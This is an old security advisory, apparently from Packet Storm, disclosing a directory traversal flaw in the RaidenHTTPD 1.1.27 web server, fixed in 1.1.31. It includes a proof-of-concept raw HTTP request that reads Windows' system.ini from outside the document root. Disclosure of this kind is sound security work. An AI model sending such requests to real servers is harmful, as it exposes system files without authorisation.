RaidenHTTPD.txt

2005-02-06T00:00:00
ID PACKETSTORM:36042
Type packetstorm
Reporter Donato Ferrante
Modified 2005-02-06T00:00:00

Description

                                        
                                            `  
Donato Ferrante  
  
  
Application: RaidenHTTPD  
http://www.raidenhttpd.com/  
  
Version: 1.1.27  
  
Bug: directory traversal  
  
Date: 05-Feb-2005  
  
Author: Donato Ferrante  
e-mail: fdonato@autistici.org  
web: www.autistici.org/fdonato  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
1. Description  
2. The bug  
3. The code  
4. The fix  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
----------------  
1. Description:  
----------------  
  
Vendor's Description:  
  
"RaidenHTTPD is a full featured web server software for Windows 98/Me/  
2000/XP/2003 platforms."  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
------------  
2. The bug:  
------------  
  
The program by default has some checks to avoid malicious patterns  
like "/../" into http requests, but the program doesn't well manage  
the initial "/" into requests. In fact if you send a request like:  
  
> GET /somefile HTTP/1.1  
  
the webserver will return the requested file if available in the  
DocumentRoot directory.  
  
  
But if you send a request like:  
  
> GET somefile HTTP/1.1  
  
the webserver will return the requested file if available in the  
disk partition where the httpd is installed.  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
-------------  
3. The code:  
-------------  
  
To test the vulnerability, send a raw http request to the server like:  
  
GET windows/system.ini HTTP/1.1  
Host: localhost  
  
  
this will display Windows' system.ini, if the http server is installed  
on the same partition of Windows.  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
------------  
4. The fix:  
------------  
  
Vendor was contacted.  
Bug fixed in the version 1.1.31.  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
`